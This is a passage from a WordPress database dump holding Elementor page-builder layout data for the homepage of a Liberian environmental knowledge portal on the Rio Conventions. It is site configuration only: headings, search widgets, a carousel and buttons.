fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11493,1865,'_elementor_version','2.7.5'),(11494,1865,'_elementor_template_type','wp-page'),(11495,1865,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11498,1866,'_wp_page_template','default'),(11499,1866,'_elementor_edit_mode','builder'),(11500,1866,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11501,1866,'_elementor_version','2.7.5'),(11502,1866,'_elementor_template_type','wp-page'),(11503,1866,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11506,1867,'_wp_page_template','default'),(11507,1867,'_elementor_edit_mode','builder'),(11508,1867,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again 